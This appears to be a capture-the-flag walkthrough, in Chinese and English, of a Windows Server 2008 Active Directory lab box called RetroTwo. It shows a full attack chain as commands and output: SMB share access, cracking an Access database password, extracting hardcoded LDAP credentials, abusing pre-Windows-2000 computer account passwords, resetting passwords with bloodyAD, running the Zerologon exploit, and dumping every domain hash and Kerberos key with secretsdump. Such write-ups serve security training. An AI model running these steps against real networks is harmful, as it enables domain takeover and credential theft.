RetroTwo
The User flag for this Box is located in a non-standard directory, C:.
1. User
1.1. Recon
1.1.1. PortScan
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# nmap 10.129.34.62
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 12:09 EDT
Nmap scan report for BLN01.retro2.vl (10.129.34.62)
Host is up (0.15s latency).
Not shown: 983 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 35.43 seconds
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# nmap 10.129.34.62 -p 53,88,135,139,389,445,464,593,636,3268,3269,3389 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 12:17 EDT
Nmap scan report for BLN01.retro2.vl (10.129.34.62)
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15F75) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15F75)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-26 16:17:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2008 R2 Datacenter 7601 Service Pack 1 microsoft-ds (workgroup: RETRO2)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro2.vl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Service
| ssl-cert: Subject: commonName=BLN01.retro2.vl
| Not valid before: 2025-10-25T16:05:40
|_Not valid after: 2026-04-26T16:05:40
| rdp-ntlm-info:
| Target_Name: RETRO2
| NetBIOS_Domain_Name: RETRO2
| NetBIOS_Computer_Name: BLN01
| DNS_Domain_Name: retro2.vl
| DNS_Computer_Name: BLN01.retro2.vl
| Product_Version: 6.1.7601
|_ System_Time: 2025-10-26T16:17:28+00:00
|_ssl-date: 2025-10-26T16:18:08+00:00; +1s from scanner time.
Service Info: Host: BLN01; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_clock-skew: mean: -11m58s, deviation: 26m47s, median: 0s
| smb2-time:
| date: 2025-10-26T16:17:29
|_ start_date: 2025-10-26T16:05:01
| smb-os-discovery:
| OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: BLN01
| NetBIOS computer name: BLN01\x00
| Domain name: retro2.vl
| Forest name: retro2.vl
| FQDN: BLN01.retro2.vl
|_ System time: 2025-10-26T17:17:32+01:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.64 seconds
1.2. SMB匿名访问public共享
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# nxc smb BLN01.retro2.vl -u guest -p '' --shares
SMB 10.129.34.62 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.129.34.62 445 BLN01 [+] retro2.vl\guest:
SMB 10.129.34.62 445 BLN01 [*] Enumerated shares
SMB 10.129.34.62 445 BLN01 Share Permissions Remark
SMB 10.129.34.62 445 BLN01 ----- ----------- ------
SMB 10.129.34.62 445 BLN01 ADMIN$ Remote Admin
SMB 10.129.34.62 445 BLN01 C$ Default share
SMB 10.129.34.62 445 BLN01 IPC$ Remote IPC
SMB 10.129.34.62 445 BLN01 NETLOGON Logon server share
SMB 10.129.34.62 445 BLN01 Public READ
SMB 10.129.34.62 445 BLN01 SYSVOL Logon server share
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# smbclient -U '' -N //BLN01.retro2.vl/public
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Aug 17 10:30:37 2024
.. D 0 Sat Aug 17 10:30:37 2024
DB D 0 Sat Aug 17 08:07:06 2024
Temp D 0 Sat Aug 17 07:58:05 2024
6290943 blocks of size 4096. 821183 blocks available
smb: \> cd db
smb: \db\> ls
. D 0 Sat Aug 17 08:07:06 2024
.. D 0 Sat Aug 17 08:07:06 2024
staff.accdb A 876544 Sat Aug 17 10:30:19 2024
6290943 blocks of size 4096. 821183 blocks available
smb: \db\> get staff.accdb
getting file \db\staff.accdb of size 876544 as staff.accdb (76.4 KiloBytes/sec) (average 76.4 KiloBytes/sec)
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# file staff.accdb
staff.accdb: Microsoft Access Database
解密一下
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# office2john staff.accdb
staff.accdb:$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970*1ec683f4d8c4e9faf77d3c01f2433e56*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235
$office$*2013*100000*256*16*5736cfcbb054e749a8f303570c5c1970*1ec683f4d8c4e9faf77d3c01f2433e56*7de0d4af8c54c33be322dbc860b68b4849f811196015a3f48a424a265d018235:class08
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 9600 (MS Office 2013)
Hash.Target......: $office$*2013*100000*256*16*5736cfcbb054e749a8f3035...018235
Time.Started.....: Mon Oct 27 00:30:07 2025 (3 secs)
Time.Estimated...: Mon Oct 27 00:30:10 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 9463 H/s (13.90ms) @ Accel:17 Loops:500 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 26112/14344388 (0.18%)
Rejected.........: 0/26112 (0.00%)
Restore.Point....: 0/14344388 (0.00%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: 123456 -> charger1
Hardware.Mon.#01.: Temp: 63c Util: 99% Core:2445MHz Mem:8001MHz Bus:8
1.3. microsoft Access DB
这个文件需要用 microsoft Access打开 但我不想装
打开后可以获取到一个VBS代码
Attribute VB_Name = "Staff"
Option Compare Database
Sub ImportStaffUsersFromLDAP()
Dim objConnection As Object
Dim objCommand As Object
Dim objRecordset As Object
Dim strLDAP As String
Dim strUser As String
Dim strPassword As String
Dim strSQL As String
Dim db As Database
Dim rst As Recordset
strLDAP = "LDAP://OU=staff,DC=retro2,DC=vl"
>>>> strUser = "retro2\ldapreader"
>>>> strPassword = "ppYaVcB5R"
Set objConnection = CreateObject("ADODB.Connection")
objConnection.Provider = "ADsDSOObject"
objConnection.Properties("User ID") = strUser
objConnection.Properties("Password") = strPassword
objConnection.Properties("Encrypt Password") = True
objConnection.Open "Active Directory Provider"
Set objCommand = CreateObject("ADODB.Command")
objCommand.ActiveConnection = objConnection
objCommand.CommandText = "<" & strLDAP & ">;(objectCategory=person);cn,distinguishedName,givenName,sn,sAMAccountName,userPrincipalName,description;subtree"
Set objRecordset = objCommand.Execute
Set db = CurrentDb
Set rst = db.OpenRecordset("StaffMembers", dbOpenDynaset)
Do Until objRecordset.EOF
rst.AddNew
rst!CN = objRecordset.Fields("cn").Value
rst!DistinguishedName = objRecordset.Fields("distinguishedName").Value
rst!GivenName = Nz(objRecordset.Fields("givenName").Value, "")
rst!SN = Nz(objRecordset.Fields("sn").Value, "")
rst!sAMAccountName = objRecordset.Fields("sAMAccountName").Value
rst!UserPrincipalName = Nz(objRecordset.Fields("userPrincipalName").Value, "")
rst!Description = Nz(objRecordset.Fields("description").Value, "")
rst.Update
objRecordset.MoveNext
Loop
rst.Close
objRecordset.Close
objConnection.Close
Set rst = Nothing
Set objRecordset = Nothing
Set objCommand = Nothing
Set objConnection = Nothing
MsgBox "Staff users imported successfully!", vbInformation
End Sub
可以得到一对凭证
strUser = "retro2\ldapreader"
strPassword = "ppYaVcB5R"
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# nxc smb BLN01.retro2.vl -u ldapreader -p ppYaVcB5R --generate-tgt ldapreader
SMB 10.129.34.62 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.129.34.62 445 BLN01 [+] retro2.vl\ldapreader:ppYaVcB5R
SMB 10.129.34.62 445 BLN01 [+] TGT saved to: ldapreader.ccache
SMB 10.129.34.62 445 BLN01 [+] Run the following command to use the TGT: export KRB5CCNAME=ldapreader.ccache
1.4. bloodhound
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# bloodhound-ce-python -c All -p ppYaVcB5R -d retro2.vl -ns 10.129.34.62 -u ldapreader --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: retro2.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: bln01.retro2.vl
INFO: Testing resolved hostname connectivity dead:beef::8930:fdfa:8cdc:ca77
INFO: Trying LDAP connection to dead:beef::8930:fdfa:8cdc:ca77
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: bln01.retro2.vl
INFO: Testing resolved hostname connectivity dead:beef::8930:fdfa:8cdc:ca77
INFO: Trying LDAP connection to dead:beef::8930:fdfa:8cdc:ca77
INFO: Found 27 users
INFO: Found 43 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer:
INFO: Querying computer: BLN01.retro2.vl
INFO: Done in 00M 37S
INFO: Compressing output into 20251026130336_bloodhound.zip
user没有路径
看下SMB有没有
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# nxc smb BLN01.retro2.vl -u ldapreader -p ppYaVcB5R --shares
SMB 10.129.34.62 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.129.34.62 445 BLN01 [+] retro2.vl\ldapreader:ppYaVcB5R
SMB 10.129.34.62 445 BLN01 [*] Enumerated shares
SMB 10.129.34.62 445 BLN01 Share Permissions Remark
SMB 10.129.34.62 445 BLN01 ----- ----------- ------
SMB 10.129.34.62 445 BLN01 ADMIN$ Remote Admin
SMB 10.129.34.62 445 BLN01 C$ Default share
SMB 10.129.34.62 445 BLN01 IPC$ Remote IPC
SMB 10.129.34.62 445 BLN01 NETLOGON READ Logon server share
SMB 10.129.34.62 445 BLN01 Public READ
SMB 10.129.34.62 445 BLN01 SYSVOL READ Logon server share
1.5. Windows Computer before 2000
可以发现有三个计算机账户是属于2000年以前的, 这个时期的计算机密码通常就是计算机名(不带 $)
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# nxc smb BLN01.retro2.vl -u users -p passwords.txt --continue-on-success
SMB 10.129.34.62 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\FS02$:ADMWS01 STATUS_LOGON_FAILURE
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\ADMWS01$:ADMWS01 STATUS_LOGON_FAILURE
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\FS01$:ADMWS01 STATUS_LOGON_FAILURE
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\FS02$:FS01 STATUS_LOGON_FAILURE
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\ADMWS01$:FS01 STATUS_LOGON_FAILURE
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\FS01$:FS01 STATUS_LOGON_FAILURE
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\FS02$:FS02 STATUS_LOGON_FAILURE
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\ADMWS01$:FS02 STATUS_LOGON_FAILURE
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\FS01$:FS02 STATUS_LOGON_FAILURE
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\FS02$:fs01 STATUS_LOGON_FAILURE
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\ADMWS01$:fs01 STATUS_LOGON_FAILURE
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\FS01$:fs01 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\FS02$:fs02 STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\ADMWS01$:fs02 STATUS_LOGON_FAILURE
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\FS01$:fs02 STATUS_LOGON_FAILURE
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\FS02$:admws01 STATUS_LOGON_FAILURE
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\ADMWS01$:admws01 STATUS_LOGON_FAILURE
SMB 10.129.34.62 445 BLN01 [-] retro2.vl\FS01$:admws01 STATUS_LOGON_FAILURE
使用 -k 验证一下
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# nxc smb BLN01.retro2.vl -u users -p passwords.txt --continue-on-success -k
SMB BLN01.retro2.vl 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB BLN01.retro2.vl 445 BLN01 [-] retro2.vl\FS02$:ADMWS01 KDC_ERR_PREAUTH_FAILED
SMB BLN01.retro2.vl 445 BLN01 [-] retro2.vl\ADMWS01$:ADMWS01 KDC_ERR_PREAUTH_FAILED
SMB BLN01.retro2.vl 445 BLN01 [-] retro2.vl\FS01$:ADMWS01 KDC_ERR_PREAUTH_FAILED
SMB BLN01.retro2.vl 445 BLN01 [-] retro2.vl\FS02$:FS01 KDC_ERR_PREAUTH_FAILED
SMB BLN01.retro2.vl 445 BLN01 [-] retro2.vl\ADMWS01$:FS01 KDC_ERR_PREAUTH_FAILED
SMB BLN01.retro2.vl 445 BLN01 [-] retro2.vl\FS01$:FS01 KDC_ERR_PREAUTH_FAILED
SMB BLN01.retro2.vl 445 BLN01 [-] retro2.vl\FS02$:FS02 KDC_ERR_PREAUTH_FAILED
SMB BLN01.retro2.vl 445 BLN01 [-] retro2.vl\ADMWS01$:FS02 KDC_ERR_PREAUTH_FAILED
SMB BLN01.retro2.vl 445 BLN01 [-] retro2.vl\FS01$:FS02 KDC_ERR_PREAUTH_FAILED
SMB BLN01.retro2.vl 445 BLN01 [-] retro2.vl\FS02$:fs01 KDC_ERR_PREAUTH_FAILED
SMB BLN01.retro2.vl 445 BLN01 [-] retro2.vl\ADMWS01$:fs01 KDC_ERR_PREAUTH_FAILED
SMB BLN01.retro2.vl 445 BLN01 [+] retro2.vl\FS01$:fs01
SMB BLN01.retro2.vl 445 BLN01 [+] retro2.vl\FS02$:fs02
SMB BLN01.retro2.vl 445 BLN01 [-] retro2.vl\ADMWS01$:fs02 KDC_ERR_PREAUTH_FAILED
SMB BLN01.retro2.vl 445 BLN01 [-] retro2.vl\ADMWS01$:admws01 KDC_ERR_PREAUTH_FAILED
两个凭证
retro2.vl\FS01$:fs01
retro2.vl\FS02$:fs02
1.6. RDP
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# nxc smb BLN01.retro2.vl -u 'fs01$' -p fs01 --generate-tgt fs01 -k
SMB BLN01.retro2.vl 445 BLN01 [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB BLN01.retro2.vl 445 BLN01 [+] retro2.vl\fs01$:fs01
SMB BLN01.retro2.vl 445 BLN01 [+] TGT saved to: fs01.ccache
SMB BLN01.retro2.vl 445 BLN01 [+] Run the following command to use the TGT: export KRB5CCNAME=fs01.ccache
直接改密码
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# bloodyAD --host BLN01.retro2.vl -u fs01$ -d retro2.vl -k set password ADMWS01$ Admin123
[+] Password changed successfully!
然后把 ldapreader 加到 services 组
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo]
└─# bloodyAD --host BLN01.retro2.vl -u fs01$ -d retro2.vl -k add groupMember 'services' ldapreader
[+] ldapreader added to services
然后就可以RDP了
xfreerdp /u:ldapreader /p:ppYaVcB5R /v:BLN01.retro2.vl /tls-seclevel:0
2008年的老系统,真是复古
2. Root
2.1. zerologon CVE-2020-1472
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo/zerologon]
└─# python set_empty_pw.py BLN01 10.129.34.62
Performing authentication attempts...
============================================================================
NetrServerAuthenticate3Response
ServerCredential:
Data: b"\xf2'(\xbf:\xf9\xe60"
NegotiateFlags: 556793855
AccountRid: 1001
ErrorCode: 0
server challenge b'\xf2\xc8\x82\xb3m5\xf3\x9d'
NetrServerPasswordSet2Response
ReturnAuthenticator:
Credential:
Data: b'\x01\x1e+\xe1Ta{\xe3'
Timestamp: 0
ErrorCode: 0
Success! DC should now have the empty string as its machine password.
┌──(root㉿kali)-[~/Desktop/htb/RetroTwo/zerologon]
└─# secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'retro2.vl/BLN01$@10.129.34.62'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c06552bdb50ada21a7c74536c231b848:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1e242a90fb9503f383255a4328e75756:::
admin:1000:aad3b435b51404eeaad3b435b51404ee:49c31c8f60320b9f416bc248231c008c:::
Julie.Martin:1105:aad3b435b51404eeaad3b435b51404ee:cf4999af837f40d72d1c5bcec27ba9b6:::
Clare.Smith:1106:aad3b435b51404eeaad3b435b51404ee:a7c82ec08414f0c54637fad20b9aac9e:::
Laura.Davies:1107:aad3b435b51404eeaad3b435b51404ee:ee74607fad6d8c51b0d488e322f82317:::
Rhys.Richards:1108:aad3b435b51404eeaad3b435b51404ee:09377f210fdbdcda6f97eda91ddc6879:::
Leah.Robinson:1109:aad3b435b51404eeaad3b435b51404ee:6333c620221c04d8fb5b6d7ca8b6d6d7:::
Michelle.Bird:1110:aad3b435b51404eeaad3b435b51404ee:c823220a9bda3ca70ebe7362187c9004:::
Kayleigh.Stephenson:1111:aad3b435b51404eeaad3b435b51404ee:a78835f0139b3b206f9598fe9c18d707:::
Charles.Singh:1112:aad3b435b51404eeaad3b435b51404ee:432119e62a10aff8c8200e4f45e772a0:::
Sam.Humphreys:1113:aad3b435b51404eeaad3b435b51404ee:3c1508fc774de1e6040c68b41a17fdee:::
Margaret.Austin:1114:aad3b435b51404eeaad3b435b51404ee:c6ebda46b0b014eda3ffcb8d92d179d9:::
Caroline.James:1115:aad3b435b51404eeaad3b435b51404ee:80835fee4ce88524f63a0ecf60870ac0:::
Lynda.Giles:1116:aad3b435b51404eeaad3b435b51404ee:dbf17856bd378ec410c20b98a749571f:::
Emily.Price:1117:aad3b435b51404eeaad3b435b51404ee:9cdf1d59674a6ddfedef2ae2545d3862:::
Lynne.Dennis:1118:aad3b435b51404eeaad3b435b51404ee:4b690295089b91881633113f13c866ee:::
Alexandra.Black:1119:aad3b435b51404eeaad3b435b51404ee:3349f04c2fdcf796a66c37b2a7658ae6:::
Alex.Scott:1120:aad3b435b51404eeaad3b435b51404ee:200155446e3b3817e8bc857dfe01b58c:::
Mandy.Davies:1121:aad3b435b51404eeaad3b435b51404ee:c144842c62c3051b8f1b8467ec62ef1f:::
Marilyn.Whitehouse:1122:aad3b435b51404eeaad3b435b51404ee:097b5b5b97e2a3b07db0b3deac5cd303:::
Lindsey.Harrison:1123:aad3b435b51404eeaad3b435b51404ee:261b8b9c79b19345e8ea15dcdfc03ecd:::
Sally.Davey:1124:aad3b435b51404eeaad3b435b51404ee:78ac830ac29ae1df8fa569b39515d5a5:::
retro2.vl\inventory:1128:aad3b435b51404eeaad3b435b51404ee:46b019644dde01251e7044a3d4185bd1:::
retro2.vl\ldapreader:1130:aad3b435b51404eeaad3b435b51404ee:fe63aaefd1cfd29d7cc5c14321a725f3:::
BLN01$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ADMWS01$:1127:aad3b435b51404eeaad3b435b51404ee:e45a314c664d40a227f9540121d1a29d:::
FS01$:1131:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::
FS02$:1132:aad3b435b51404eeaad3b435b51404ee:eb354224f433cd7cd824b1fdce8c0795:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:1de3d3d429521d8d99e4b4b31da5ce5f993902a8876adaabdd9449a5256c220f
krbtgt:aes128-cts-hmac-sha1-96:8250eee9083a48b1fca675d7d0ce3699
krbtgt:des-cbc-md5:d334438313291520
admin:aes256-cts-hmac-sha1-96:055842e1ada4e1cba5bd0286a4fa9de9337b0324104adc533aabea23ddc353b7
admin:aes128-cts-hmac-sha1-96:1e0f4d9eb0ea70d225db67d53f297934
admin:des-cbc-md5:70d0624397c708df
Julie.Martin:aes256-cts-hmac-sha1-96:5428f080b3303d74da2a344d0b799d97dfb5795fee1d1ed64b3e7e9cc3cbec5c
Julie.Martin:aes128-cts-hmac-sha1-96:8757cfac9fd8af791bd8f5c9b8bfac0c
Julie.Martin:des-cbc-md5:0e85dca2e3e6291a
Clare.Smith:aes256-cts-hmac-sha1-96:65c7c8d4e980f1e63fab4af0fb8b8dc17e9bddff20e7b8bb5fa5c1690561f406
Clare.Smith:aes128-cts-hmac-sha1-96:54cc3c8caadcd6e9b605d2da4c96e55f
Clare.Smith:des-cbc-md5:61fe8f52b39ecb9d
Laura.Davies:aes256-cts-hmac-sha1-96:9ada131aebb330b859770d3177e4b6bf2e37e994d83761e83c296e3dd0549fa4
Laura.Davies:aes128-cts-hmac-sha1-96:c00363c7acdb7e6efb47e90c46eb73f5
Laura.Davies:des-cbc-md5:31d670ec9b16c762
Rhys.Richards:aes256-cts-hmac-sha1-96:805f8d2f3f6c92cbf7bf0fc2449ec03ac8446b0f595aeb68d5e34932bdf1f9a8
Rhys.Richards:aes128-cts-hmac-sha1-96:baeaf7d174ea76419d381e545935aef2
Rhys.Richards:des-cbc-md5:6b0e2cf7ae3de3e3
Leah.Robinson:aes256-cts-hmac-sha1-96:90848db193370cc832b199b27137ef581b78eddc2d5f635a0e01e0b1c514c326
Leah.Robinson:aes128-cts-hmac-sha1-96:6aa30b143db0f0e65517bb062a4fe6c7
Leah.Robinson:des-cbc-md5:d9b6abe30e851f9b
Michelle.Bird:aes256-cts-hmac-sha1-96:a76108bec6385a4469d5eff1d4d5ccaaf066b981d56d3df82f058c1b66b9c653
Michelle.Bird:aes128-cts-hmac-sha1-96:ca9fdc76c484d05397433e90c2d9b84c
Michelle.Bird:des-cbc-md5:79b016e69ec4b59b
Kayleigh.Stephenson:aes256-cts-hmac-sha1-96:6c11e6b4e5e263bbb7b6859b7e4380bf9fce222de2e51da9f033c370d1bd3b34
Kayleigh.Stephenson:aes128-cts-hmac-sha1-96:69ced3d12c16659ae2fdaa2bab6df2f3
Kayleigh.Stephenson:des-cbc-md5:ce7ae949452a1997
Charles.Singh:aes256-cts-hmac-sha1-96:0eb1f6abc867ac77603b9b6f8b454abfef421c6eec2518e28e0e40ee3efb6215
Charles.Singh:aes128-cts-hmac-sha1-96:3cee7675dd2615a5214127faacb30930
Charles.Singh:des-cbc-md5:9125dcd6d3ad4fb6
Sam.Humphreys:aes256-cts-hmac-sha1-96:878ea36ddce6a9e5b050021e757669ff94b8b3367bcb9461dc83cdbcc1342b77
Sam.Humphreys:aes128-cts-hmac-sha1-96:102e420c74d34cda602282342c555b72
Sam.Humphreys:des-cbc-md5:5b5bc1a8683816c4
Margaret.Austin:aes256-cts-hmac-sha1-96:500b6f66a68c384b76ee63fb2d309278638c4eaa2903a7555b7f0a63ed2da30e
Margaret.Austin:aes128-cts-hmac-sha1-96:2bb2066bea0481bf7c9fae65a908bb64
Margaret.Austin:des-cbc-md5:077f91679bcb6dda
Caroline.James:aes256-cts-hmac-sha1-96:0ddabfe9574396df083878375b0e7100c4466698a1d0fa812a07b0bc17f44583
Caroline.James:aes128-cts-hmac-sha1-96:574766e01691af43749a8c0cc566af0f
Caroline.James:des-cbc-md5:29574998cd13f813
Lynda.Giles:aes256-cts-hmac-sha1-96:dc9ca6bdfd27960e9c5700864e0fec0a388f903747d79c61d773cc6e24ea2253
Lynda.Giles:aes128-cts-hmac-sha1-96:c2eaf2f31cb78d18ac51c1c8b0cd496d
Lynda.Giles:des-cbc-md5:62b9082f6e1ab92a
Emily.Price:aes256-cts-hmac-sha1-96:37d0c3e846f44b0c0afe005b178c1e2689ab8cf227c60345e4d83af3bedcd908
Emily.Price:aes128-cts-hmac-sha1-96:87331a1b619dc0b817a00bd7882973b3
Emily.Price:des-cbc-md5:d592c7dce0386489
Lynne.Dennis:aes256-cts-hmac-sha1-96:ec46f167dac2f0763fa4891b4ec7204e8b791b6e757b88f13eaf0a3069d91520
Lynne.Dennis:aes128-cts-hmac-sha1-96:a6de42302e21936f728c6340cc3924b4
Lynne.Dennis:des-cbc-md5:2337fe088083d561
Alexandra.Black:aes256-cts-hmac-sha1-96:63e7bcd8c3827fafac984927c8ee7a410644603b87df03a73d93a5d83d351199
Alexandra.Black:aes128-cts-hmac-sha1-96:f7f77113ff7a8e070f8d961a973afa80
Alexandra.Black:des-cbc-md5:70dcdcef4a584c67
Alex.Scott:aes256-cts-hmac-sha1-96:56e28035bf0e773b08eac63f2ded3b77150f4662335fecfe0d167439954c3c6c
Alex.Scott:aes128-cts-hmac-sha1-96:1743a9bfda5a6d4937e10833aa94261a
Alex.Scott:des-cbc-md5:c47a9e6475452f7c
Mandy.Davies:aes256-cts-hmac-sha1-96:f9ab0b0127d819088c6e20f2a22b62e658e65413634a982e7a03029860b5fbbb
Mandy.Davies:aes128-cts-hmac-sha1-96:775c402ad1b82a01d00d24cdce2f0cff
Mandy.Davies:des-cbc-md5:0dcb62cd49a4070b
Marilyn.Whitehouse:aes256-cts-hmac-sha1-96:070d0ec84b01cee1f4e6f7fde70978e38dd06e9718d29165f7b34687f2bfc57d
Marilyn.Whitehouse:aes128-cts-hmac-sha1-96:983446f761745cac59cfdf6533be1e62
Marilyn.Whitehouse:des-cbc-md5:b34fad80d6583d52
Lindsey.Harrison:aes256-cts-hmac-sha1-96:df8a640121c7931e4b1e24a903831bbdb2ceca342bc32df0d642be5ad59aebaa
Lindsey.Harrison:aes128-cts-hmac-sha1-96:9c0600e456143cb3a958434295e230c5
Lindsey.Harrison:des-cbc-md5:df4afde6a83d586d
Sally.Davey:aes256-cts-hmac-sha1-96:ad994860516e89a93515d9934fbc92ae0e18ac10a4179ce0b5e856d21239c07d
Sally.Davey:aes128-cts-hmac-sha1-96:1bd25ea0251be749c0b9ff10c0443728
Sally.Davey:des-cbc-md5:8940a2cde9fb45f1
retro2.vl\inventory:aes256-cts-hmac-sha1-96:251d2610ccb122fbefecbc0bad2a0f1ecffe39e48734d40fc31f9d6c32d9c3a6
retro2.vl\inventory:aes128-cts-hmac-sha1-96:6a4787b610d341b0d99758c8dd80a405
retro2.vl\inventory:des-cbc-md5:ad08041f6b0861a7
retro2.vl\ldapreader:aes256-cts-hmac-sha1-96:1f38605e159b9f10ba465530aa4ea2d9fd5429b3bf348fa8559b5acc647c0b32
retro2.vl\ldapreader:aes128-cts-hmac-sha1-96:000256e0522cc3cd2f52c6bfe1698368
retro2.vl\ldapreader:des-cbc-md5:8908762379fdfdae
BLN01$:aes256-cts-hmac-sha1-96:ffd22246332c76f0831bbae3acbcf7d9160e780f77ecbf6322ec536b8744a280
BLN01$:aes128-cts-hmac-sha1-96:00489881457ca7f5ba4dac2e1395fd44
BLN01$:des-cbc-md5:0886138c15a70157
ADMWS01$:aes256-cts-hmac-sha1-96:0dc5aa7e0eb1459d1213ee8a7f0646bd0088e34cc534ccdb317c7b7c39a7ff91
ADMWS01$:aes128-cts-hmac-sha1-96:7140b1ffde0959ef2816055600d62036
ADMWS01$:des-cbc-md5:2a1af4625b206798
